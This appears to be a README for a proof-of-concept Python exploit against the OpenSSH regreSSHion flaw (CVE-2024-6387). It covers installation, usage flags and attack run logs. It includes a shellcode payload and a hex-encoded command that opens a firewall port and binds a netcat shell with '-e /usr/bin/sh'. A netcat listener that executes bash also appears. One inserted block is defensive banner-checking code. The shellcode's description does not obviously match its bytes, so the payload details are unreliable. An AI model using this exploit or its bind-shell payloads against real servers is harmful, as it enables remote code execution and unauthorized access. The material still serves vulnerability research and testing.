CVE-2024-6387 regreSSHion

Proof-of-concept Python script for the regreSSHion exploit. Version 0.2.1, build POC regreSSHion-green-banner.

Installation

git clone https://github.com/l-urk/CVE-2024-6387.git
cd CVE-2024-6387
pip3 install -r requirements.txt
python3 regreSSHion.py -h

Usage

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target SSH server IPv4 ( format: -i 0.0.0.0 )
  -p PORT, --port PORT  target SSH server port number ( format: -p 22 )
  -t, --time            ENABLE TIME displayed on all log output ( format: -t )
  -c, --clear           CLEAR SCREEN before running the exploit ( format: -c )
  -d, --debug           enable see the DEBUG LOGS output on run ( format: -d )
  -r, --repeat          enable to REPEAT EXPLOIT until RCE wins ( format: -r )
  -x, --skipssh         enable this to SKIP SSH HANDSHAKES ( format: -x )
  -y, --skipheap        enable this to SKIP HEAP and parse ( format: -y )
  -z, --skipfinal       enable this to SKIP FINAL ID CHECK ( format: -z )

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk

To use the script, run regreSSHion.py with python3:

  • Set --ip to the vulnerable SSH server's IPv4 address
  • Set --port to the vulnerable SSH server's port number

python3 regreSSHion.py --ip 127.0.0.1 --port 22
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4

Let's say you make it all the way here in the script...

2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.

If the script reports that exploit verification succeeded, the payload was delivered and executed. The script will retry a few times before giving up. I would suggest trying this on your own vulnerable SSH server until you get a feel for reaching the success message.

2024-08-03 22:47:15,891 - ERROR - Exploitation failed.

Debug mode

  • With debug mode enabled you get more verbose output: the received SSH version string, packet length information, and essentially everything else that happens and can be logged.

python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug

Example Output:

2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
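The debug log above exposes the server's identification string. As an added defensive companion (not code from this repository), the check below parses an OpenSSH banner and compares it against the affected ranges the help text lists (1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8); the sample banners are constructed, the first being the one the debug log shows, and the vendor-build caveat is the part that matters when reading results for a fleet.

```python
import re
from typing import Optional, Tuple

# Affected ranges exactly as listed in the script's help text, inclusive at
# both ends, as (major, minor, patch, portable "pN" level). A bare "4.4" or
# "9.8" sorts before "4.4p1" / "9.8p1", so the fixed portable releases fall
# outside the ranges.
AFFECTED_RANGES = [
    ((1, 2, 2, 1), (4, 4, 0, 0)),   # 1.2.2p1 ~ 4.4
    ((8, 5, 0, 1), (9, 8, 0, 0)),   # 8.5p1 ~ 9.8
]

# Identification string, e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1".
# Text after the first space is the optional comment (vendor build info).
BANNER_RE = re.compile(
    r"^SSH-\d+\.\d+-OpenSSH_(?P<ver>\d+\.\d+(?:\.\d+)?)(?:p(?P<p>\d+))?(?: (?P<comment>.*))?$"
)


def parse_banner(banner: str) -> Optional[Tuple[Tuple[int, int, int, int], str]]:
    """Return ((major, minor, patch, portable), comment) or None if not OpenSSH."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    parts = [int(x) for x in m.group("ver").split(".")]
    parts += [0] * (3 - len(parts))                  # "8.9" -> 8.9.0
    return (parts[0], parts[1], parts[2], int(m.group("p") or 0)), (m.group("comment") or "")


def in_affected_range(version: Tuple[int, int, int, int]) -> bool:
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def assess(banner: str) -> dict:
    """Classify one banner as not-openssh, outside-range, in-range, or in-range-unconfirmed."""
    parsed = parse_banner(banner)
    if parsed is None:
        return {"verdict": "not-openssh", "version": None, "vendor_build": False}
    version, comment = parsed
    vendor_build = bool(comment)
    if not in_affected_range(version):
        verdict = "outside-range"
    elif vendor_build:
        # Distributions backport fixes without bumping the upstream version, so a
        # version-only match on a vendor build is a lead to confirm against the
        # package changelog, not a finding.
        verdict = "in-range-unconfirmed"
    else:
        verdict = "in-range"
    return {"verdict": verdict, "version": version, "vendor_build": vendor_build}
```

Constructed input such as `assess("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1")` yields `in-range-unconfirmed`, which is the correct reading of that banner: the number matches, but only the distribution's package version can confirm whether the fix was backported.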

shellcode payload

The default shellcode uses ufw to open incoming port 9999 and starts an nc listening shell on port 9999.

    shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

shellcode payload creation

You can make your own shellcode payload with an ASCII-to-hex converter and manually turning the result into shellcode. I use this ASCII-to-hex website: https://www.rapidtables.com/convert/number/ascii-to-hex.html

  • Input your desired text for the shellcode.
  • Use the settings "User defined" and "\x" in the input box.
  • Replace all capital X's with lowercase x's.
  • Use Notepad or another program capable of character replacement.
  • Move the last \x from the end to the start of the hex string.
  • Add quotes to both ends for interpretation by the shell.

shellcode payload examples

hello world

hello world
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

printf hello world

printf hello world
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

make test file

test > test
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"

Allow incoming connections on port 9999 & open a nc shell on port 9999

ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"

send_socket.py

If you want to test the execution of a shellcode payload, you can use the send_socket.py script. Usage:

usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)

Sender:

python3 send_socket.py -i 127.0.0.1 -p 1111

Listener:

  • raw text interpretation

nc -lvp 1111

  • shell execution

nc -lvp 1111 -e /usr/bin/bash